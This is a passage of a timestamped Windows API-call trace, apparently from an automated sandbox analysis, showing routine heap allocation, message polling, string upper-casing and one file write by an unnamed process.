out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] lstrlenW (lpString="31") returned 2 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] lstrlenW (lpString="20") returned 2 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cea18, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cea18) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.244] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.244] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.244] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.244] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.244] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.246] WriteFile (in: hFile=0x2c4, lpBuffer=0x2a9e0f8*, nNumberOfBytesToWrite=0x3fb0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9e0f8*, lpNumberOfBytesWritten=0x8cf5e4*=0x3fb0, lpOverlapped=0x0) returned 1 [0086.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.275] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71608 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71608 | out: hHeap=0x2af0000) returned 1 [0086.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76ec8 [0086.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.276] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0086.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71608 [0086.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71608 | out: hHeap=0x2af0000) returned 1 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774b8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.276] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71758 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71608 [0086.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71608 | out: hHeap=0x2af0000) returned 1 [0086.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71608 [0086.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a770d0 [0086.324] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71608 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.324] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77350 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9280 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77378 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71748 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9100 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77490 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71608 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9280 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.325] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9280 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71618 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71698 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71758 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71698 | out: hHeap=0x2af0000) returned 1 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9418 [0086.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93d0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93d0 | out: hHeap=0x2af0000) returned 1 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77558 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94c0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.326] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71698 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a770d0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93b8 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71938 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77698 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a779b8 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71698 | out: hHeap=0x2af0000) returned 1 [0086.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.326] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a770d0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93d0 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71698 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71888 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0086.327] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71888 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717a8 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71818 [0086.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717a8 | out: hHeap=0x2af0000) returned 1 [0086.328] lstrlenW (lpString="62") returned 2 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71988 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.328] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.328] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718d8 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717b8 [0086.329] 